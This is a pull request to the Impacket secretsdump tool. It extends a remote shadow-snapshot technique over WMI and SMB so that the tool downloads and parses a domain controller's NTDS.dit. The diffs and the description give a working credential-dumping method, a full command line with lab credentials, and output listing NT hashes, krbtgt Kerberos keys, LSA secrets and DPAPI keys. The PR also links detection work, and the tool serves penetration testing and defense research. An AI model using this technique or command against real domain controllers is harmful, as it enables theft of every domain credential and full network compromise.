### PR TITLE
[SECRETSDUMP] - NTDS.dit Dumping with Shadow Snapshot Method via WMI (No Code Execution)

### DIFF
--- a/examples/secretsdump.py
+++ b/examples/secretsdump.py
@@ -196,8 +196,8 @@ class DumpSecrets:
                 self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost,
                                                     self.__ldapConnection)
                 self.__remoteOps.setExecMethod(self.__options.exec_method)
-                sam_path, system_path, security_path, *ntds_path = self.__remoteOps.createSSandDownload(self.__remoteSSMethodWMIRemoteVolume,
-                                                                                                        self.__remoteSSMethodWMIDownloadPath, self.__remoteSSMethodWMINTDS)
+                sam_path, system_path, security_path, *ntds_path = self.__remoteOps.createSSandDownloadWMI(self.__remoteSSMethodWMIRemoteVolume,
+                                                                                                           self.__remoteSSMethodWMIDownloadPath, self.__remoteSSMethodWMINTDS)
                 self.__samHive = sam_path
                 self.__systemHive = system_path
                 self.__securityHive = security_path

--- a/examples/secretsdump.py
+++ b/examples/secretsdump.py
@@ -116,10 +116,10 @@ class DumpSecrets:
         self.__resumeFileName = options.resumefile
         self.__canProcessSAMLSA = True
         self.__kdcHost = options.dc_ip
-        self.__remoteSSMethodWMI = options.use_remoteSSMethod
-        self.__remoteSSMethodWMINTDS = options.use_remoteSSMethod_NTDS
-        self.__remoteSSMethodWMIRemoteVolume = options.remoteSS_remote_volume
-        self.__remoteSSMethodWMIDownloadPath = options.remoteSS_local_path
+        self.__remoteSSWMI = options.use_remoteSSWMI
+        self.__remoteSSWMINTDS = options.use_remoteSSWMI_NTDS
+        self.__remoteSSMethodWMIRemoteVolume = options.remoteSSWMI_remote_volume
+        self.__remoteSSMethodWMIDownloadPath = options.remoteSSWMI_local_path
         self.__options = options
 
         if options.hashes is not None:
@@ -178,7 +178,7 @@ class DumpSecrets:
             # Almost like LOCAL but create (and deletes it after finishing) a Shadow Snapshot at target and download SAM, SYSTEM and SECURITY from the SS. No Code Execution.
             # If specified, NTDS will be also downloaded and parsed (no code execution needed, in contrast to vssadmin method). Use it when targeting a DC.
             # Then, parse locally
-            if self.__remoteSSMethodWMI:
+            if self.__remoteSSWMI:
                 self.__isRemote = False
                 self.__useVSSMethod = True
                 try:
@@ -197,11 +197,11 @@ class DumpSecrets:
                                                     self.__ldapConnection)
                 self.__remoteOps.setExecMethod(self.__options.exec_method)
                 sam_path, system_path, security_path, *ntds_path = self.__remoteOps.createSSandDownloadWMI(self.__remoteSSMethodWMIRemoteVolume,
-                                                                                                           self.__remoteSSMethodWMIDownloadPath, self.__remoteSSMethodWMINTDS)
+                                                                                                           self.__remoteSSMethodWMIDownloadPath, self.__remoteSSWMINTDS)
                 self.__samHive = sam_path
                 self.__systemHive = system_path
                 self.__securityHive = security_path
-                self.__ntdsFile == ntds_path[0] if ntds_path else None
+                self.__ntdsFile = ntds_path[0] if ntds_path else None
 
                 localOperations = LocalOperations(self.__systemHive)
                 bootKey = localOperations.getBootKey()
@@ -317,7 +317,7 @@ class DumpSecrets:
 
                 self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
                                                noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
-                                               useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
+                                               useVSSMethod=self.__useVSSMethod, remoteSSMethodWMINTDS=self.__remoteSSWMINTDS, justNTLM=self.__justDCNTLM,
                                                pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
                                                outputFileName=self.__outputFileName, justUser=self.__justUser,
                                                skipUser=self.__skipUser, ldapFilter=self.__ldapFilter,
@@ -419,13 +419,13 @@ if __name__ == '__main__':
                         help='Use the Kerb-Key-List method instead of default DRSUAPI')
     parser.add_argument('-exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec '
                         'method to use at target (only when using -use-vss). Default: smbexec')
-    parser.add_argument('-use-remoteSSMethod', action='store_true',
+    parser.add_argument('-use-remoteSSWMI', action='store_true',
                         help='Remotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse locally')
-    parser.add_argument('-use-remoteSSMethod-NTDS', action='store_true',
+    parser.add_argument('-use-remoteSSWMI-NTDS', action='store_true',
                         help='Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a DC.')
-    parser.add_argument('-remoteSS-remote-volume', action='store', default='C:\\',
+    parser.add_argument('-remoteSSWMI-remote-volume', action='store', default='C:\\',
                         help='Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to C:\\')
-    parser.add_argument('-remoteSS-local-path', action='store', default='.',
+    parser.add_argument('-remoteSSWMI-local-path', action='store', default='.',
                         help='Path where download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current path')
 
     group = parser.add_argument_group('display options')

--- a/impacket/examples/secretsdump.py
+++ b/impacket/examples/secretsdump.py
@@ -1282,7 +1282,7 @@ class RemoteOperations:
 
         return remoteFileName
 
-    def createSSandDownload(self, volume, localPath):
+    def createSSandDownload(self, volume, localPath, NTDS=False):
         LOG.info('Creating SS')
         ssID = self.__wmiCreateShadow(volume)
         LOG.info('Getting SMB equivalent PATH to access remotely the SS')
@@ -1294,6 +1294,9 @@ class RemoteOperations:
         paths = [('%s/SAM' % localPath, '%s\\System32\\config\\SAM' % gmtSMBPath),
                  ('%s/SYSTEM' % localPath, '%s\\System32\\config\\SYSTEM' % gmtSMBPath),
                  ('%s/SECURITY' % localPath, '%s\\System32\\config\\SECURITY' % gmtSMBPath)]
+
+        if NTDS:
+            paths.append(('%s/ntds.dit' % localPath, '%s\\Windows\\NTDS\\ntds.dit' % gmtSMBPath))
 
         for p in paths:
             with open(p[0], 'wb') as local_file:
@@ -2734,9 +2737,9 @@ class NTDSHashes:
             else:
                 skipUsers = self.__skipUser.split(',')
         
-        if self.__useVSSMethod is True:
+        if self.__useVSSMethod is True or self.__remoteSSMethodWMINTDS is True:
             if self.__NTDS is None:
-                # No NTDS.dit file provided and were asked to use VSS
+                # No NTDS.dit file provided and were asked to use VSS or Shadow Snapshot Method via WMI
                 return
         else:
             if self.__NTDS is None:

--- a/impacket/examples/secretsdump.py
+++ b/impacket/examples/secretsdump.py
@@ -1282,7 +1282,7 @@ class RemoteOperations:
 
         return remoteFileName
 
-    def createSSandDownload(self, volume, localPath, NTDS=False):
+    def createSSandDownloadWMI(self, volume, localPath, NTDS=False):
         LOG.info('Creating SS')
         ssID = self.__wmiCreateShadow(volume)
         LOG.info('Getting SMB equivalent PATH to access remotely the SS')
@@ -1296,7 +1296,10 @@ class RemoteOperations:
                  ('%s/SECURITY' % localPath, '%s\\System32\\config\\SECURITY' % gmtSMBPath)]
 
         if NTDS:
+            LOG.debug('Adding NTDS Path')
             paths.append(('%s/ntds.dit' % localPath, '%s\\Windows\\NTDS\\ntds.dit' % gmtSMBPath))
+
+        LOG.debug('Paths: ', paths)
 
         for p in paths:
             with open(p[0], 'wb') as local_file:


### PR DESCRIPTION
### NTDS.dit Dumping with Shadow Snapshot Method via WMI (No Code Execution)

This method is essentially the same that was implemented in https://github.com/fortra/impacket/pull/1719 but also for NTDS.dit.

This PR adds a new flag, -use-remoteSSWMI-NTDS. When this flag is specified (among with specifyng to use this method, -use-remoteSSWMI) _secretsdump_ will download NTDS.dit apart from SAM, SYSTEM and SECURITY. Then, offline, all of them will be parsed and domain credentials will be also dumped.

As a reminder of the workflow of this technique:

1. A Shadow Snapshot is created remotely via WMI. Create method of class Win32_ShadowCopy (https://learn.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/create-method-in-class-win32-shadowcopy)
2. Then, via SMB, the Shadow Snapshot is accesed using a previous version Token (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/bffc70f9-b16a-453b-939a-0b6d3c9263af). Shadow Snapshots are listed using SMB via SCTL_SRV_ENUMERATE_SNAPSHOTS (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/5a43eb29-50c8-46b6-8319-e793a11f6226)
3. Then, SAM, SYSTEM, SECURITY (and if specfified via -use-remoteSSWMI-NTDS NTDS.dit) are download. Without a Shadow Snapshot this disk access attempt would be denied.
4. Then locally they are parsed and dumped.
5. Finally, the Shadow Snapshot is deleted. Call to DeleteInstance (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wmi/dc4aee01-7b9f-4c1a-8671-658fa334b8a4)

Here is an example of an execution.

```
┌──(.venv)─(kali㉿kali)-[~/impacket/examples]                                                                                                                                      
└─$ python secretsdump.py -use-remoteSSWMI -use-remoteSSWMI-NTDS 'test/Administrator:abc1234_@192.168.1.126'                                                                       
/home/kali/impacket/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this pac
kage or pin to Setuptools<81.                                                            
  import pkg_resources                                                                                                                                                             
Impacket v0.13.0.dev0+20250810.190725.2d3e0bf7 - Copyright Fortra, LLC and its affiliated companies                                                                                
                                                                                                                                                                                   
[*] Creating SS                                                                                                                                                                                                                          
[*] Getting SMB equivalent PATH to access remotely the SS                                                                                                                          
[*] Target system bootKey: 0x9c838df5bafbcdf46a9e9fc7e3cc320d                                                                                                                      
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                                                                               
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2f626b3ec5c5c2155433ed574c7c1866:::                                                                                             
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                     
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                            
[*] Dumping cached domain logon information (domain/username:hash)                                                                                                                 
[*] Dumping LSA Secrets                                                                                                                                                            
[*] $MACHINE.ACC                                                                                                                                                                   
TEST\WIN-C8B562FKVBE$:aes256-cts-hmac-sha1-96:72f88a014df4126b6a700d702322885493b8b94a74f183559b403cf7d6c52fab                                                                     
TEST\WIN-C8B562FKVBE$:aes128-cts-hmac-sha1-96:efd47da70649d82394505dd86082a2a1                                                                                                     
TEST\WIN-C8B562FKVBE$:des-cbc-md5:01319745c8dff102                                                                                                                                 
TEST\WIN-C8B562FKVBE$:plain_password_hex:95e4ac17c39ce0bc6fc7d93c3c37d74ebffa894086917830706120dceab71ccab0619fb7310dce7205a7a74ef6f1c1a9a061adec0f7195122a4d2096b4c893b46f3614a2793b298980b997cf3f6c1a237931d448eae2ee21db95ac7f3648031cd6df924980faf930276d2160ab40842fc45bf548d1f24a374cfffa610b
45e79fa65bbcab6963fe3cbb4fecd3e3b7195b1443bb6d1bbebefceb1ffe61415fa831d5d05c3b22f84097d66fddc12db185f3c87b744f0c87f89a4458cfa5b8d2b224a58dd2cf3ad8d6738da3ad1dcb223ecd2c3567081ae291afd746e3de0a27303e9e041e7c2e24db3395f610a1cdd30fb5                             
TEST\WIN-C8B562FKVBE$:aad3b435b51404eeaad3b435b51404ee:758be5426c60da524cf2def88f8a97c0:::                                                                                         
[*] DPAPI_SYSTEM                                                                                                                                                                   
dpapi_machinekey:0x323613e6f4a0687446aa173e5c35723fd14ed326                              
dpapi_userkey:0xe3405f79fe600ded17daff16ae2210a788f7d036                                                                                                                           
[*] NL$KM                                                                                                                                                                          
 0000   78 A4 F6 2D A9 B8 72 F9  6A 5A E0 5D D7 E1 A1 3D   x..-..r.jZ.]...=                                                                                                        
 0010   7C 7E FF D2 6C CF 26 F6  01 70 6D EA FA D1 6A 02   |~..l.&..pm...j.                                                                                                                                                              
 0020   52 D2 25 08 22 9F 89 FD  A6 10 77 C6 15 11 D6 A1   R.%.".....w.....                                                                                                        
 0030   8E 86 5C C0 E4 CE A2 99  5A 92 73 FE 49 E5 74 E8   ..\.....Z.s.I.t.                                                                                                        
NL$KM:78a4f62da9b872f96a5ae05dd7e1a13d7c7effd26ccf26f601706deafad16a0252d22508229f89fda61077c61511d6a18e865cc0e4cea2995a9273fe49e574e8                                                                                                   
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                      
[*] Searching for pekList, be patient                                                                                                                                                                                                    
[*] PEK # 0 found and decrypted: 6315e0795ebc515673b8dcdf71474d57                                                                                                                  
[*] Reading and decrypting hashes from ./ntds.dit                                                                                                                                  
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dae67f00c3e2b500421a6c34dee227c4:::                                                                                             
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                     
WIN-C8B562FKVBE$:1000:aad3b435b51404eeaad3b435b51404ee:758be5426c60da524cf2def88f8a97c0:::                                                                                         
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:74062b9ea360ad3ac63293b775b59cf4:::                                                                                                                                                          
test.local\test:1104:aad3b435b51404eeaad3b435b51404ee:dae67f00c3e2b500421a6c34dee227c4:::                                                                                                         
[*] Kerberos keys from ./ntds.dit                                                                                                                                                                 
Administrator:aes256-cts-hmac-sha1-96:3a504affe03083bfff061f12c19e694d2d1fd611d1c13e9cff8fd5d447adcc20                                                                                                                                   
Administrator:aes128-cts-hmac-sha1-96:fcae55f2481b70a5a7b0db809e7cc6e6                                                                                                                                                                   
Administrator:des-cbc-md5:37ec5e31d98615a1                                                                                                                                                        
WIN-C8B562FKVBE$:aes256-cts-hmac-sha1-96:72f88a014df4126b6a700d702322885493b8b94a74f183559b403cf7d6c52fab                                                                                                                                
WIN-C8B562FKVBE$:aes128-cts-hmac-sha1-96:efd47da70649d82394505dd86082a2a1                                                                                                                                                                
WIN-C8B562FKVBE$:des-cbc-md5:b6e9bf4aae25081f                                                                                                                                                                                            
krbtgt:aes256-cts-hmac-sha1-96:38ecafb709fff0cba2123524e29cfc9256b8db4bbc671fecd2fa533e309a437d                                                                                                                                          
krbtgt:aes128-cts-hmac-sha1-96:c895c116c41806df1004ac5fdf0185f8                                                                                                                                                                          
krbtgt:des-cbc-md5:29eafb859225d032                                                                                 
test.local\test:aes256-cts-hmac-sha1-96:fa1a517950a4d204d0a709c8067ececb343f9663709257baae894be5c753ab4d                                                                                                                                                                                           
test.local\test:aes128-cts-hmac-sha1-96:e136e9bffbe70f3b2a851596472fcae8                                                                                                                                                                 
test.local\test:des-cbc-md5:8c6419cd0b3e08ec                                                                        
[*] Cleaning up... 
```

Here is the relevant part of the help about this flags.

```
[...]
  -use-remoteSSWMI      Remotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse locally
  -use-remoteSSWMI-NTDS
                        Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a DC.
  -remoteSSWMI-remote-volume REMOTESSWMI_REMOTE_VOLUME
                        Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to C:\
  -remoteSSWMI-local-path REMOTESSWMI_LOCAL_PATH
                        Path where download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current path
[...]
```

More on this can be read here: https://labs.itresit.es/2025/06/11/remote-windows-credential-dump-with-shadow-snapshots-exploitation-and-detection/

Also, a detection PoC can be found here: https://github.com/I3IT/Detect.Remote.ShadowSnapshot.Dump

Also the options previously implemented have been renamed to clearer names:

- -use-remoteSSWMI
- -use-remoteSSWMI-NTDS
- -remoteSSWMI-remote-volume
- -remoteSSWMI-local-path

### **IMPORTANT NOTE**

When reading directly from disk NTDS.dit it can be in a inconsistent state. For example, when a new user or modifications have been made and they have not been "merged" yet from the transactions logs.

If when using this method you encounter an error during the parsing of ntds.dit and password are not dumped you should try repairing the ESE database using `Esentutl /repair` (https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875504(v=ws.11)). After that, the NTDS database should be fixed and ready to be dumped locally. In a testing environment it would be enough rebooting the DC.

<img width="1003" height="405" alt="image" src="https://github.com/user-attachments/assets/7e22023b-9524-4219-91ea-4939627456ba" />

<img width="628" height="857" alt="image" src="https://github.com/user-attachments/assets/c4d4b35f-03d9-4c1f-b67b-06180eac4f93" />
